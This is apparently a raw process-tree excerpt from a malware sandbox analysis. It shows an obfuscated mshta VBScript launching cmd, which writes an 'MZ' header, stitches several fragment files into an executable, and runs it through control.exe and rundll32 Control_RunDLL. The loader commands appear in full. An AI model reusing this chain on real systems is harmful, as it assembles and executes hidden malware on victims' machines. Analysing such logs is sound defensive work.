C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIPt:cLOSe ( CREAteoBJeCT( "wScripT.sHeLl" ). RuN ( "CMD /R EcHo | sET /P = ""MZ"" > xWMjA.R& cOpY /Y /b xWMJA.R + gVVBI.~ +RTXU4.XIZ + ycAolFG.S + 8YVAB.9U+ 6Hi7P2BI.2 BN8YnAg.P & StaRT control.exe .\BN8YNAg.P ", 0,TrUE ))4⤵PID:3036
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHo | sET /P = "MZ" > xWMjA.R& cOpY /Y /b xWMJA.R+ gVVBI.~ +RTXU4.XIZ + ycAolFG.S+ 8YVAB.9U+6Hi7P2BI.2 BN8YnAg.P &StaRT control.exe .\BN8YNAg.P5⤵PID:2884
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "6⤵PID:612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>xWMjA.R"6⤵PID:1952
-
-
C:\Windows\SysWOW64\control.execontrol.exe .\BN8YNAg.P6⤵PID:1764
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\BN8YNAg.P7⤵PID:1288
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\BN8YNAg.P8⤵PID:1416
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\BN8YNAg.P9⤵PID:2484
-
-
-
-
-
-
-
-